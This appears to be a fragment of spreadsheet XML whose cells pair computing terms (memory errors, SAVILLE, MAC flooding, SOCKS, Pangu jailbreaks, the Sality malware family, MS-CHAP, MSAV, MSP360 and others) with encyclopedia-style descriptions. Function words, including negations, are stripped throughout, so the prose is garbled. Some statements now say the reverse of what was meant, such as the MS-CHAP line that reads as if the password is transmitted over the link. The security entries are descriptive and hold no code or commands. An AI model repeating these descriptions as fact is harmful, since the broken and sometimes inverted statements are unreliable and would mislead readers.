memory allocators.with access source code, libraries exist collect track legitimate values pointers ("metadata") check pointer access metadata validity, boehm garbage collector. general, memory safety safely assured using tracing garbage collection insertion runtime checks every memory access; approach overhead, less valgrind. garbage-collected languages take approach. c++, many tools exist perform compile-time transformation code memory safety checks runtime, checkpointer addresssanitizer imposes average slowdown factor 2.another approach uses static program analysis automated theorem proving ensure program free memory errors. example, rust programming language implements borrow checker ensure memory safety. tools coverity offer static memory analysis c++'s smart pointers limited form approach. types memory errors many different types memory errors occur: access errors: invalid read/write pointer buffer overflow out-of-bound writes corrupt content adjacent objects, internal data (like bookkeeping information heap) return addresses. buffer over-read out-of-bound reads reveal sensitive data help attackers bypass address space layout randomization. race condition concurrent reads/writes shared memory invalid page fault accessing pointer outside virtual memory space. null pointer dereference often cause exception program termination environments, cause corruption operating system kernels systems without memory protection, null pointer involves large negative offset. free dereferencing dangling pointer storing address object deleted. uninitialized variables variable assigned value used. contain undesired languages, corrupt value. null pointer dereference dereferencing invalid pointer pointer memory allocated wild pointers arise pointer used prior initialization known state. they show erratic behaviour dangling pointers, though less likely stay undetected. memory leak memory usage tracked tracked incorrectly stack exhaustion occurs program runs stack space, typically deep recursion. guard page typically halts program, preventing memory corruption, functions large stack frames bypass page. heap exhaustion program tries allocate memory amount available. languages, condition must checked manually allocation. double free repeated calls free prematurely free object address. exact address reused, corruption occur, especially allocators free lists. invalid free passing invalid address free corrupt heap. mismatched free multiple allocators use, attempting free memory deallocation function different allocator unwanted aliasing memory location allocated modified twice unrelated purposes. references</t>
  </si>
  <si>
    <t>SAVILLE</t>
  </si>
  <si>
    <t>saville classified type encryption algorithm, developed late 1960s, jointly government communications headquarters (gchq) national security agency (nsa) used broadly, often voice encryption, implemented many encryption devices. little known publicly algorithm classified nature inclusion nsa's suite some documentation related kyk-13 fill device statements made military officials confirm saville 128-bit key, consists bits 8-bit checksum. furthermore, known saville modes operation: autonomous mode (also known key-auto-key kak) autoclave mode (also known cipher-text auto ctak). microchip, runs clock rate (compare baton 129%). cypris chip mentions modes; specifications windster indictor specify provide saville some devices protocols implement saville: secure telephone equipment (stu) vinson family (voice encryption) lamberton (bid/250) apco project (single-channel land mobile radios) (saville algorithm versatile encryption chips: aim, cypris, sierra i/ii, windster, indictor, presidio, railman spendex spendex (also known dbt) elcrovox references external links saville info cryptomuseum.com</t>
  </si>
  <si>
    <t>MAC flooding</t>
  </si>
  <si>
    <t>computer networking, media access control attack flooding technique employed compromise security network switches. attack works forcing legitimate table contents switch forcing unicast flooding behavior potentially sending sensitive information portions network normally intended attack method switches maintain table maps individual addresses network physical ports switch. this allows switch direct data physical port recipient located, opposed indiscriminately broadcasting data ports ethernet does. advantage method data bridged exclusively network segment containing computer data specifically destined for. typical flooding attack, switch many ethernet frames, containing different source addresses, attacker. intention consume limited memory aside switch store address table.the effect attack vary across implementations, however desired effect attacker) force legitimate addresses address table, causing significant quantities incoming frames flooded ports. flooding behavior flooding attack gets name. after launching successful flooding attack, malicious user packet analyzer capture sensitive data transmitted computers, would accessible switch operating normally. attacker also follow spoofing attack allow retain access privileged data switches recover initial flooding attack. flooding also used rudimentary vlan hopping attack. counter measures prevent flooding attacks, network operators usually rely presence features network equipment: with feature often called "port security" vendors, many advanced switches configured limit number addresses learned ports connected stations. smaller table secure addresses maintained addition (and subset traditional address table. many vendors allow discovered addresses authenticated authentication, authorization accounting (aaa) server subsequently filtered. implementations ieee 802.1x suites often allow packet filtering rules installed explicitly server based dynamically learned information clients, including address. security features prevent spoofing address spoofing cases also perform additional address filtering unicast packets, however implementation-dependent side-effect. additional security measures sometimes applied along prevent normal unicast flooding unknown addresses. this feature usually relies "port security" feature retain secure addresses least long remain table layer devices. hence, aging time learned secure addresses separately adjustable. this feature prevents packets flooding normal operational circumstances, well mitigating effects flood attack. references</t>
  </si>
  <si>
    <t>SOCKS</t>
  </si>
  <si>
    <t>socks internet protocol exchanges network packets client server proxy server. socks5 optionally provides authentication authorized users access server. practically, socks server proxies connections arbitrary address, provides means packets forwarded. socks performs layer model (the session layer, intermediate layer presentation layer transport layer). socks server accepts incoming client connection port 1080, defined 1928. history protocol originally developed/designed david koblas, system administrator mips computer systems. after mips taken silicon graphics 1992, koblas presented paper socks year's usenix security symposium, making socks publicly available. protocol extended version ying-da nec. socks reference architecture client owned permeo technologies, spin-off nec. (blue coat systems bought permeo technologies, turn acquired symantec.) socks5 protocol originally security protocol made firewalls security products easier administer. approved ietf 1996 1928 (authored leech, ganis, lee, kuris, koblas, jones). protocol developed collaboration aventail corporation, markets technology outside asia. usage socks facto standard circuit-level gateways (level gateways).the circuit/session level nature socks make versatile tool forwarding since socks5) traffic, creating interface types routing tools. used circumvention tool, allowing traffic bypass internet filtering access content otherwise blocked, e.g., governments, workplaces, schools, country-specific services. since socks detectable, common approach present socks interface sophisticated protocols: onion proxy software presents socks interface clients. providing similar functionality virtual private network, allowing connections forwarded server's "local" network: some suites, openssh, support dynamic port forwarding allows user create local socks proxy. this free user limitations connecting predefined remote port server. protocol socks4 typical socks4 connection request looks like this: socks version number, 0x04 version command code: 0x01 establish tcp/ip stream connection 0x02 establish tcp/ip port bindingdstport 2-byte port number network byte order) destip ipv4 address, bytes network byte order) user string, variable length, null-terminated.vn reply version, null byte reply codedstport destination port, meaningful granted bind, otherwise ignore dstip destination ip:port client bind tofor example, socks4 request connect fred 66.102.7.99:80, server replies "ok": client: 0x04 0x01 0x00 0x50 0x42 0x66 0x07 0x63 0x46 0x72 0x65 0x64 0x00 last field "fred" ascii, followed null byte. server: 0x00 0x5a 0xxx 0xxx 0xxx 0xxx 0xxx 0xxx 0xxx byte value. socks4 protocol specifies values bytes ignored.from point onwards, data sent socks client socks server relayed 66.102.7.99, vice versa. command field 0x01 "connect" 0x02 "bind"; "bind" command allows incoming connections protocols active ftp. socks4a socks4a extends socks4 protocol allow client specify destination domain name rather address; useful client cannot resolve destination host's domain name address. proposed ying-da lee, author socks4.the client first three bytes dstip null last byte non-zero value. (this corresponds address 0.0.0.x, nonzero, inadmissible destination address thus never occur client resolve domain name.) following null byte terminating userid, client must send destination domain name terminate another null byte. this used "connect" "bind" requests. client socks server: socks4_c socks4 client handshake packet (above) domain domain name host contact null (0x00) terminatedserver socks client: (same socks4) server using protocol socks4a must check dstip request packet. represents address 0.0.0.x nonzero server must read domain name client sends packet. server resolve domain name make connection destination host can. socks5 socks5 protocol defined 1928. incompatible extension socks4 protocol; offers choices authentication adds support ipv6 udp, latter used lookups. initial handshake consists following: client connects sends greeting, includes list authentication methods supported. server chooses methods sends failure response none acceptable). several messages pass client server, depending authentication method chosen. client sends connection request similar socks4. server responds similar socks4.the initial greeting client socks version (0x05) nauth number authentication methods supported, uint8 auth authentication methods, byte method supported authentication methods supported numbered follows: 0x00: authentication 0x01: gssapi (rfc 1961 0x02: username/password (rfc 1929) 0x03–0x7f: methods assigned iana0x03: challenge-handshake authentication protocol 0x04: unassigned 0x05: challenge-response authentication method 0x06: secure sockets layer 0x07: authentication 0x08: multi-authentication framework 0x09: json parameter block 0x0a–0x7f: unassigned 0x80–0xfe: methods reserved private usever socks version (0x05) cauth chosen authentication method, 0xff acceptable methods offeredthe subsequent authentication method-dependent. username password authentication (method 0x02) described 1929: 0x01 current version username/password authentication idlen, username length, uint8; username bytestring pwlen, password length, uint8; password bytestringver 0x01 current version username/password authentication status 0x00 success, otherwise failure, connection must closedafter authentication connection proceed. first define address datatype type type address. 0x01: ipv4 address 0x03: domain name 0x04: ipv6 addressaddr address data follows. depending type: bytes ipv4 address byte name length followed 1–255 bytes domain name bytes ipv6 addressver socks version (0x05) command code: 0x01: establish tcp/ip stream connection 0x02: establish tcp/ip port binding 0x03: associate portrsv reserved, must 0x00 dstaddr destination address, address structure above. dstport port number network byte orderver socks version (0x05) status status code: 0x00: request granted 0x01: general failure 0x02: connection allowed ruleset 0x03: network unreachable 0x04: host unreachable 0x05: connection refused destination host 0x06: expired 0x07: command supported protocol error 0x08: address type supportedrsv reserved, must 0x00 bndaddr server bound address (defined 1928) "socks5 address" format specified bndport server bound port number network byte ordersince clients allowed either resolved addresses domain names, convention curl exists label domain name variant socks5 "socks5h", simply "socks5". similar convention exists socks4a socks4. software servers socks proxy server implementations java system proxy server caching proxy server running solaris, linux windows servers support https, nsapi filters, dynamic reconfiguration, socksv5 reverse proxy. wingate multi-protocol proxy server socks server microsoft windows supports socks4, socks4a socks5 (including udp-associate gssapi auth). also supports handing socks connections http proxy, cache scan http socks. socksgate5 socksgate5 application-socks firewall inspection feature layer model, application layer. because packets inspected level application-socks firewall search protocol non-compliance blocking specified content. dante circuit-level socks server used provide convenient secure network connectivity, requiring host dante runs external network connectivity. other programs providing socks server interface openssh allows dynamic creation tunnels, specified subset socks protocol, supporting connect command. putty win32 client supports local creation socks (dynamic) tunnels remote servers. shimmercat server uses socks5 simulate internal network, allowing developers test local sites without modifying /etc/hosts file. system intended enable online anonymity. offers tcp-only socks server interface clients. shadowsocks circumvent censorship tool. provides socks5 interface. netcat implementations ncat socat. clients client software must native socks support order connect socks. there programs allow users circumvent limitations: socksifiers socksifiers allow applications access networks proxy without needing support proxy protocols. common virtual network adapter appropriate routing tables send traffic adapter. win2socks, enables applications access network socks5, https shadowsocks. tun2socks, open source tool creates virtual adapters socks proxy. works linux windows, macos port udp-capable reimplementation golang. proxychains, unix program forces traffic socks http proxies (dynamically-linked) programs launches. works various unix-like systems. translating proxies polipo, forwarding caching http/1.1 proxy server ipv4 support. open source running linux, openwrt, windows, freebsd. almost browser privoxy, non-caching socks-to-http proxy. tinyproxy, light-weight http/https proxy daemon posix operating systems. designed ground fast small. presents http proxy interface connect socks4/5 http upstream proxies. security lack request packets exchange encryption makes socks practically vulnerable man-in-the-middle attacks addresses eavesdropping consequence clears censorship governments. references external links 1928: socks protocol version 1929: username/password authentication socks 1961: gss-api authentication method socks version 3089: socks-based ipv6/ipv4 gateway mechanism draft-ietf-aft-socks-chap, challenge-handshake authentication protocol socks socks: protocol proxy across firewalls, socks protocol version (nec)</t>
  </si>
  <si>
    <t>SPECvirt</t>
  </si>
  <si>
    <t>specvirt_sc2010 computer benchmark evaluates performance server computer virtualization. available standard performance evaluation corporation (spec). introduced july, 2010.the specvirt_sc2010 benchmark measures maximum number workloads platform simultaneously maintaining specific quality service metrics. each workload, called tile, consists specific virtual machines.in addition generating results show performance, benchmark also used generate performance watt results. specvirt_sc2010 supported spec february 2014 successor specvirt_sc2013. also performance watt vmmark references external links official specvirt website</t>
  </si>
  <si>
    <t>MOBILedit</t>
  </si>
  <si>
    <t>mobiledit forensic digital forensics product compelson labs searches, examines report data gsm/cdma/pcs cell phone devices. mobiledit connects cell phone devices infrared (ir) port, bluetooth link, wi-fi, cable interface. after connectivity established, phone model identified manufacturer, model number, serial number (imei) corresponding picture phone. data acquired cell phone devices stored .med file format. after successful logical acquisition, following fields populated data: subscriber information, device specifics, phonebook, phonebook, missed calls, last numbers dialed, received calls, inbox, sent items, drafts, files folder. items present files folder, ranging graphics files camera photos tones, depend phone’s capabilities. additional features include myphonesafe.com service, provides access imei database register check stolen phones.mobiledit platform works variety phones smartphones complete list supported handsets available manufacturer’s website) explores contents phone outlook-like folder structure. this allows backup information stored phone, storing copy data another phone phone copier feature. references external links nist.gov mobiledit.com</t>
  </si>
  <si>
    <t>MOSQUITO</t>
  </si>
  <si>
    <t>cryptography, mosquito stream cipher algorithm designed joan daemen paris kitsos. submitted estream project ecrypt network. after initial design broken joux muller, tweaked version named moustique proposed made phase estream evaluation process self-synchronizing cipher remaining. however, moustique subsequently broken käsper al., leaving design secure efficient self-synchronising stream cipher open research problem.</t>
  </si>
  <si>
    <t>Paping</t>
  </si>
  <si>
    <t>paping (pronounced ping) computer network administration utility used test reachability host internet protocol (tcp/ip) network measure time takes connect specified port. name play word ping, another computer network administration utility. because icmp used identify operating system remote machine, sometimes blocked. icmp blocked, ping cannot used identify service responding. publicly available services must keep relevant ports open, paping attempt make connections ports determine service responding. similar utilities nmap allow range ports scanned, however allow repetitively scan ports. paping operates attempting connect internet protocol tcp/ip port target. process measures time taken connection established records connection failures. results test printed form statistical summary connections made including minimum, maximum, mean connection times. paping cross-platform software, currently supporting windows linux.as april 2013, project appears abandoned fixes versions produced. sample paping test following sample output paping en.wikipedia.org tcp/ip port (http) linux host: ./paping en.wikipedia.org paping v1.5.1 copyright 2010 mike lovell connecting text.pmtpa.wikimedia.org [208.80.152.2] connected 208.80.152.2: time=64.11ms protocol=tcp port=80 connected 208.80.152.2: time=64.03ms protocol=tcp port=80 connected 208.80.152.2: time=65.81ms protocol=tcp port=80 connected 208.80.152.2: time=63.56ms protocol=tcp port=80 connected 208.80.152.2: time=63.95ms protocol=tcp port=80 connected 208.80.152.2: time=64.29ms protocol=tcp port=80 connected 208.80.152.2: time=64.35ms protocol=tcp port=80 connected 208.80.152.2: time=64.99ms protocol=tcp port=80 connected 208.80.152.2: time=63.10ms protocol=tcp port=80 connected 208.80.152.2: time=64.02ms protocol=tcp port=80 connection statistics: attempted connected failed (0.00%) approximate connection times: minimum 63.10ms, maximum 65.81ms, average 64.22ms references external links code.google.com/p/paping/</t>
  </si>
  <si>
    <t>MPEG Common Encryption</t>
  </si>
  <si>
    <t>mpeg common encryption (abbreviated mpeg-cenc) refers mpeg standards governing different container formats: isobmff, common encryption base media file format files (iso/iec 23001-7:2016) mpeg-ts, common encryption mpeg-2 transport streams (iso/iec 23001-9:2016)the specifications compatible, conversion encrypted formats happen without re-encryption. they define metadata, specific format, parts stream encrypted encryption scheme. each encryption scheme different methods retrieve decryption key. availability standards standards purchased iso.org, paper digital forms. july 2016, prices swiss franc (us$122) isobmff version, swiss franc (us$60) version. included copyright notice prohibits redistribution without written permission, also local area networks. each page watermarked purchaser's name company. references external links "cenc" initialization data format rough description, specific isobmff, clear encryption scheme, intended encrypted media extensions</t>
  </si>
  <si>
    <t>Pano Logic</t>
  </si>
  <si>
    <t>pano logic manufacturer devices present virtual desktops user local processing power contrast thin client technologies). they describe concept "zero client". this perceived offering benefits end-user support power provision desks. versions included displays vendors, allowing single unit deployed. company failed october 2012. march 2013, propalms announced acquired rights support panologic customers, "help transition customer base platform". products pano logic devices support vmware microsoft's hyper-v hypervisors well windows windows operating systems, support launched april 2010 release pano system 3.0. pano logic also introduced 2010 pano express, pre-loaded, pre-configured 50-user suite combining vmware vsphere essentials, microsoft windows licenses, server storage hardware pano logic’s zero client platform.the pano logic platform three main components. software components pano manager pano direct service. hardware pano zero client (sometimes called pano device). pano logic offers additional accessory, pano remote. this encrypted token-like device allows remote users access virtual pano system uses pano direct technology, including pano direct protocol—a udp-based low-level bus-extension protocol—to provide remote windows desktop experience across local area network (lan). pano states provides better computer performance commonly using protocols originally developed terminal services ica. pano system runs desktop virtual machines centralized servers using bare-metal hypervisor, virtual machine management layer, vmware's vsphere suites specifically vmware server esxi later. pano manager pano manager central management component architecture. discovers controls pano devices, manages vmware virtual infrastructure, connects assigned users virtual desktops monitors status user sessions, taking corrective action necessary. pano manager provides management layer also connects underlying optional management tools, vmware's vcenter server (formerly vmware virtual center, part vmware virtual infrastructure product suite), security authentication directories openldap, novell edirectory microsoft active directory. pano pano direct service, pano (formerly pano desktop service), lightweight windows service resides desktop virtual machine operating system instance links peripherals attached stateless pano device unmodified windows drivers installed virtual machine pano provides low-level driver support display, input/output, peripherals, ultimately enabling control pano device. pano also allows native windows drivers forms peripherals. pano zero client pano zero client 3.5" 3.5" silver black cube supports pano system delivers computing user. device provides connections peripherals including keyboards mice along connection displays. older model vga-only). also audio connections. pano device draws watts power running compared around watts consumed average desktop idle mode. small size allows mounted directly behind monitor optional vesa mount. pano remote pano remote released april 2009 provides users pano virtual desktops access virtual desktop location, requiring windows vista computer available port. pano remote delivered secure loaded preconfigured pano remote software. pano remote require software hardware, instead uses standard secure protocols (rdp https/secure sockets layer) connect bundled component called pano gateway running microsoft windows server 2008 terminal server gateway server, simplifying configuration firewalls security policies. shutdown acquisition pano logic quietly shut operations 2012. acquired propalms, turn changed name thinspace. also comparison platform virtualization software desktop virtualization virtualization virtual machine virtual appliance references external links pano logic, inc. website virtual desktop vendor pano logic shuts down rumor?</t>
  </si>
  <si>
    <t>Pangu Team</t>
  </si>
  <si>
    <t>pangu team (chinese: 盘古越狱团队; pinyin: pángǔ yuèyù tuánduì), chinese programming team community developed pangu jailbreaking tools. these tools assist users bypassing device restrictions enabling root access operating system. this permits user install applications customizations typically unavailable official store. etymology versions chinese mythology, name pangu chinese (chinese: word first living creator all. pangu jailbreak pangu pangu jailbreak 7.1.x free jailbreaking tool developed pangu team capable executing jailbreaks various devices (ipod touch, iphone ipad) using various exploits. tool first released june 2014 utc+08:00 jailbreak devices fourth generation apple (for tvos 9.0.1). initial release tool included support 7.1.2. this team suspected firmware update imminent, apple would release patch vulnerabilities used tool. controversy pangu uses revoked enterprise certificate inject jailbreak, removed jailbreak complete.in initial release (v1.0.0), 25pp, chinese cracked store would installed user uncheck check checked default installation. 25pp removed package version 1.1.0. originally v1.0.0), pangu achieved jailbreaking using infoleak vulnerability taken stefan esser's (aka: i0n1c) paid security training sessions, along vulnerabilities found themselves. although team acknowledges esser's help within pangu jailbreak tool, esser took twitter everyone know okay" pangu using exploit discovered.one pangu members, daniel_k4, later responded public asked sign paid security training sessions, infoleak known everyone attended security training sessions. daniel_k4 said found similar vulnerability infoleak, used since want disclose vulnerabilities. infoleak used bypass kaslr make untethered jailbreak alone. team said never thought using learned paid class would wrong.pangu offered esser another vulnerability compensation received response. thus, since version 1.1.0 release, esser's infoleak replaced another vulnerability found pangu. pangu pangu8 pangu jailbreak free jailbreak tool pangu team. first released october 2014 utc+08:00. tool compatible devices capable running (iphone iphone plus, ipad mini ipad currently available chinese english. cydia included initial release package, added v1.1.0 available pangu website. pangu since cydia incompatible initial release, pangu8 included pangu allows users install cydia, alongside various pangu fixes recommended software. tool works tweaking utility also recommends tools openssh. after cydia installed, pangu removed device removing "pangu loader ios" cydia respringing device. uninstalling pangu removing pangu jailbreak. users remove pangu jailbreak restore device latest version. moreover, difficult downgrade device back previous version apple stops signing versions release newer firmware. initial releases also enabled cydia installed debian package file instead within pangu alternative. pangu pangu9 pangu jailbreak latest free jailbreak tool pangu team. first released october 2015 utc+08:00. included jailbreak 9.0.2. march 2016, pangu released pangu9 v1.3.0 included jailbreak 9.1. tool capable jailbreaking devices running 64-bit devices running 9.1. currently available english. there windows versions available. cydia bundled pangu9 first release, removing need pangu found previous pangu jailbreaks. pp25 assistant (pp助手) released july 2016, pp25 also known pangu9 pangu9 jailbreak 9.3.3 supported 64-bit devices supported ipod ipad release). application known assistant chinese program install cracked apps. pangu jailbreak bundled assistant option install pp25 device. during jailbreak process apple used install unofficial jailbreak. english version released, adding support ipod ipad likely support 32-bit. 9.3.3 apple corrected "iomobileframebuffer" 9.3.4, released august 2016. “team pangu” credited source update official security notes.apple states: "available for: iphone later, ipad later, ipod touch (5th generation) later; impact: application able execute arbitrary code kernel privileges; description: memory corruption issue addressed improved memory handling. cve-2016-4654: team pangu"like releases, 9.3.4 designed iphone later, ipad later, ipad mini later, ipad range, generation ipod touch later. outsiders recommend upgrade 9.3.3 9.3.4 jailbreak. exploits pangu9 (ios 9.1) worked allowing access photos able install unsigned application cydia. pangu9 (ios 9.3.3) used similar exploit. allowing notifications enabled installation cydia. used bundled pp25 allowed jailbreak without computer. also jailbreaking apple hardware restrictions rooting (android references external links pangu.io official site chinese) pangu official site (english) pangu越狱工具 chinese) pangu jailbreak tool pangu official weibo chinese) official twitter</t>
  </si>
  <si>
    <t>Sality</t>
  </si>
  <si>
    <t>sality classification family malicious software (malware), infects files microsoft windows systems. sality first discovered 2003 advanced years become dynamic, enduring full-featured form malicious code. systems infected sality communicate peer-to-peer (p2p) network form botnet purpose relaying spam, proxying communications, exfiltrating sensitive data, compromising servers and/or coordinating distributed computing tasks purpose processing intensive tasks (e.g. password cracking). since 2010, certain variants sality also incorporated rootkit functions part ongoing evolution malware family. because continued development capabilities, sality considered complex formidable forms malware date. aliases majority antivirus (a/v) vendors following naming conventions referring family malware: sality salload kookoo salicode kukacka overview sality family polymorphic file infectors, target windows executable files extensions .exe .scr. sality utilizes polymorphic entry-point obscuring (epo) techniques infect files using following methods: changing entry point address host, replacing original host code entry point executable variable stub redirect execution polymorphic viral code, inserted last section host file; stub decrypts executes secondary region, known loader; finally, loader runs separate thread within infected process eventually load sality payload.sality execute malicious payload deletes files certain extensions and/or beginning specific strings, terminates security-related processes services, searches user’s address book e-mail addresses send spam messages, contacts remote host. sality also download additional executable files install malware, purpose propagating install applications. sality contain trojan components; variants ability steal sensitive personal financial data (i.e. information stealers), generate relay spam, relay traffic http proxies, infect sites, achieve distributed computing tasks password cracking, well capabilities.sality’s downloader mechanism downloads executes additional malware listed urls received using peer-to-peer component. distributed malware share “code signature” sality payload, provide attribution group and/or share large portion code. additional malware typically communicates reports central command control (c&amp;c) servers located throughout world. according symantec, "combination file infection mechanism fully decentralized peer-to-peer network [...] make sality effective resilient malware today's threat landscape."two versions botnet currently active, versions malware circulated botnets digitally signed attackers prevent hostile takeover. recent years, sality also included rootkit techniques maintain persistence compromised systems evade host-based detections, anti-virus software. installation sality infects files affected computer. most variants dropped computer. file written disk forms, example: %system%\wmdrtc32.dll %system%\wmdrtc32.dl_the file contains bulk virus code. file extension ".dl_" compressed copy. recent variants sality, virus:win32-sality.am, drop dll, instead load entirely memory without writing disk. this variant, along others, also drops driver random file name folder %system%\drivers. other malware also drop sality computer. example, sality variant detected virus:win32-sality.au dropped worm:win32-sality.au. some variants sality, also include rootkit creating device name device\amsint32 \dosdevices\amsint32. method propagation file infection sality usually targets files drive .scr .exe file extensions, beginning root folder. infected files increase size varying amount. virus also targets applications windows start frequently used applications, referenced following registry keys: hkcu\software\microsoft\windows\shellnoroam\muicache hkcu\software\microsoft\windows\currentversion\run hklm\software\microsoft\windows\currentversion\runsality avoids infecting particular files, order remain hidden computer: files protected system file checker (sfc) files %systemroot% folder executables several antivirus/firewall products ignoring files contain certain substrings removable drives network shares some variants sality infect legitimate files, moved available removable drives network shares enumerating network share folders resources local computer files drive (beginning root folder). infects files finds adding code section host inserting malicious code newly added section. legitimate file exists, malware copy file temporary files folder infect file. resulting infected file moved root available removable drives network shares following: random file name.pif random file name.exe random file name.cmdthe sality variant also creates "autorun.inf" file root drives points virus copy. when drive accessed computer supporting autorun feature, virus launched automatically. some sality variants also drop file .tmp file extension discovered network shares resources well drop .lnk file dropped virus. payload sality inject code running processes installing message hook sality commonly searches attempts delete files related antivirus updates terminate security applications, antivirus personal firewall programs; attempts terminate security applications containing strings files avoids infecting; also terminate security-related services block access security-related websites contain certain substrings sality variants modify computer registry lower windows security, disable windows registry editor and/or prevent viewing files hidden attributes; some sality variants recursively delete registry values data registry subkeys hkcu\system\currentcontrolset\control\safeboot hklm\system\currentcontrolset\control\safeboot prevent user starting windows safe mode some sality variants steal sensitive information cached passwords logged keystrokes, entered affected computer sality variants usually attempt download execute files including install executables using preconfigured list 1000 peers; goal network exchange lists urls feed downloader functionality; files downloaded windows temporary files folder decrypted using several hardcoded passwords most sality’s payload executed context processes, makes cleaning difficult allows malware bypass firewalls; avoid multiple injections process, system-wide mutex called &lt;process name&gt;.exem_&lt;process id&gt;_ created every process code injected, would prevent instance running memory time. some variants win32-sality drop driver random file name folder %system%\drivers perform similar functions terminate security-related processes block access security-related websites, also disable system service descriptor table (ssdt) hooks prevent certain security software working properly some sality variants spread moving available removable/remote drives network shares some sality variants drop .lnk files, automatically dropped virus some sality variants search user's outlook address book internet explorer cached files e-mail addresses send spam messages, sends spammed messages based information retrieves remote server sality section configuration file %systemroot%\system.ini infection marker, contact remote hosts confirm internet connectivity, report infection author, receive configuration data, download execute arbitrary files (including updates additional malware), receive instruction remote attacker, and/or upload data taken affected computer; sality variants open remote connection, allowing remote attacker download execute arbitrary files infected computer computers infected recent versions sality, virus:win32-sality.at, virus:win32-sality.au, connect infected computers joining peer-to-peer (p2p) network receive urls pointing additional malware components; protocol runs udp, messages exchanged network encrypted, local port number used connect network generated function computer name sality rootkit includes driver capabilities terminating processes ntterminateprocess well blocking access select anti-virus resources (e.g. anti-virus vendor sites) filtering; latter requires driver register callback function, used determine packets dropped forwarded (e.g. drop packets string contains name anti-virus vendor comprised list) recovery microsoft identified dozens files commonly associated malware. sality uses stealth measures maintain persistence system; thus, users need boot trusted environment order remove sality also make configuration changes windows registry, makes difficult download, install and/or update virus protection. also, since many variants sality attempt propagate available removable/remote drives network shares, important ensure recovery process thoroughly detects removes malware known/possible locations. also computer virus references</t>
  </si>
  <si>
    <t>MS-CHAP</t>
  </si>
  <si>
    <t>ms-chap microsoft version challenge-handshake authentication protocol, chap. protocol exists versions, ms-chapv1 (defined 2433) ms-chapv2 (defined 2759). ms-chapv2 introduced pptp3-fix included windows added windows "windows dial-up networking security upgrade release" windows "dial networking performance security update windows upgrade. windows vista dropped support ms-chapv1. ms-chap used authentication option microsoft's implementation pptp protocol virtual private networks. also used authentication option radius servers used ieee 802.1x (e.g., wifi security using wpa-enterprise protocol). used main authentication option protected extensible authentication protocol (peap). compared chap, ms-chap: enabled negotiating chap algorithm 0x80 (0x81 ms-chapv2) option authentication protocol provides authenticator-controlled password change mechanism provides authenticator-controlled authentication retry mechanism defines failure codes returned failure packet message field ms-chapv2 provides mutual authentication peers piggybacking peer challenge response packet authenticator response success packet. ms-chap requires peer either know plaintext password, hash password. transmit password link. such, compatible password storage formats. cryptanalysis several weaknesses identified ms-chap ms-chapv2. encryption used ntlmv1 ms-chapv2 encrypt ntlm password hash make custom hardware attacks utilizing method brute force feasible. more recently, ms-chap completely broken. also cracker references</t>
  </si>
  <si>
    <t>MSAV</t>
  </si>
  <si>
    <t>microsoft anti-virus (msav) antivirus program introduced microsoft ms-dos operating system. program first appeared ms-dos version (1993) last appeared ms-dos 6.22. first version antivirus program basic, inbuilt update facility (updates obtained manually installed user) could scan 1,234 different viruses. microsoft anti-virus windows (mwav), included part package, front allowed msav properly windows 3.1x. 2009, microsoft launched in-house antivirus solution named microsoft security essentials, later phased favor microsoft defender. history microsoft anti-virus supplied central point software inc. (later acquired symantec 1994 integrated symantec's norton antivirus product) stripped version central point anti-virus (cpav) product central point software inc., licensed carmel software engineering haifa, israel. carmel software sold product turbo anti-virus domestically abroad. microsoft anti-virus windows also provided central point software. features msav featured "detect clean" strategy detection boot sector trojan horse-type viruses (which typical virus problems time). program also anti-stealth check feature could used detect changes normal files. this technology intended make unavailability regular update packages. final update msav released june 1996 symantec. update added ability detect polymorphic viruses virus definitions updated scan total 2,371 viruses. vsafe vsafe terminate stay resident component msav provided real-time virus protection. default, vsafe following: checks executable files viruses execution). checks disks (hard drive floppy) boot sector viruses. warns attempts write boot sector partition table hard disk warns formatting could erase hard disk.there features enabled, vsafe can: warn attempts executable files terminate stay resident normal methods). prevent programs writing disk. warn attempts write boot sector floppy disk. warn attempts modify executable files.vsafe number virus definitions embedded within executable capable loading additional signatures (updates) external definition file. also internet security comparison antivirus software comparison firewalls references</t>
  </si>
  <si>
    <t>MSP360 Backup</t>
  </si>
  <si>
    <t>msp360, formerly cloudberry lab, software application service provider company develops online backup, remote desktop file management products integrated cloud storage providers. msp360 backup msp360 explorer offered personal “freemium” model. other products, including advanced msp360 backup versions, sold license free trials available. msp360 backup service backup-as-a-service application centralized management monitoring allows managed service providers businesses backup restore desktops servers. msp360 backup supports windows, windows server, macos, linux operating systems work microsoft server exchange applications, vmware microsoft hyper-v virtualization software. history msp360 founded cloudberry 2008 incorporated 2011, initially releasing cloudberry explorer amazon followed versions microsoft azure, google cloud, openstack swift. first based newport beach, california. 2011, company released msp360 backup, followed releases support windows server imaging, microsoft server exchange applications, bare metal restore windows server desktop operating systems. msp360 backup added support linux operating systems 2015, followed editions synology qnap. 2012, company introduced msp360 backup console; saas backup disaster recovery service managed service providers businesses require centralized administration management larger environments. 2018, company introduced msp360 connect (formerly remote desktop); remote control desktop sharing solution designed secure access control remote desktops servers internet. 2020, company's corporate headquarters moved pittsburgh. 2021, msp360 introduced msp360 rmm; endpoint monitoring management solution designed msps teams manage infrastructures. products msp360 develops software services help managed service providers, businesses, consumers manage backup disaster recovery perform cloud file management synchronization. company's main products include msp360 backup, msp360 remote desktop, msp360 explorer, msp360 drive. msp360 backup msp360 backup online backup integrates 3rd-party cloud storage providers. supports data backup restore windows (desktop servers), macos linux. additionally, offers support microsoft server, microsoft exchange, vmware, hyper-v, office suite (google apps). available several commercial editions well free offering (msp360 backup desktop free). msp360 backup also available saas service designed help service providers manage backup recovery across multiple computers servers. both msp360 backup software console designed automate backup recovery files, folders, system images. storage-agnostic, meaning storage decoupled backup license. customers work directly cloud storage providers pricing features need. msp360 backup supports cloud storage providers, including: amazon amazon glacier, microsoft azure, google cloud platform, backblaze wasabi, openstack, compatible, others. msp360 backup supports multiple data storage tiers, including lower cost options like microsoft azure cool blob storage archive blob storage, amazon infrequent access glacier, google cloud storage nearline coldline. history 2011, msp360 backup released support amazon subsequently updated support microsoft azure, google cloud platform number cloud vendors. late 2011, msp360 released windows server edition, followed support microsoft server, microsoft exchange, bare metal restore.msp360 backup added additional operating system support linux macos 2015. freeware version msp360 backup also appeared year. technology msp360 backup written primarily c++. programming languages. windows versions also rely .net, msp360 backup console built using asp.net, angular, node.js. features msp360 backup provides backup recovery functionality cloud, local storage, network shares. backup recovery plans configured using graphical user interface. command-line interface also available editions msp360 backup supported operating systems (windows, macos, linux).msp360 developed proprietary block-level algorithm speeds data uploads backups cloud. addition, company uses proprietary image-based algorithm back complete systems image files, retaining ability recover specific files within images, desired.msp360 backup supports recovery images directly cloud-based virtual server services amazon ec2, azure virtual machines, google compute engine, well bare-metal devices. product restore system 